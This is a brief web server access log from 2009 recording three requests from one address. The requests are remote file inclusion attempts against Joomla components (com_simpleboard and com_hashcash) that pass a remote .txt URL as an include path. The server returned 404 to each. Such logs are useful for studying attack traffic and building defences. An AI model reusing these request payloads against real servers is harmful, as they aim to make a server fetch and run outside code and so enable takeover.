60.43.229.5 - - [27/Jun/2009:11:53:41 -0500] "GET /logs/access_log.1239148800//components/com_simpleboard/file_upload.php?sbp=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 341 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:54:03 -0500] "GET /logs/access_log.1235606400//components/com_simpleboard/file_upload.php?sbp=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 341 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:11:54:27 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 311 "-""Mozilla/5.0"
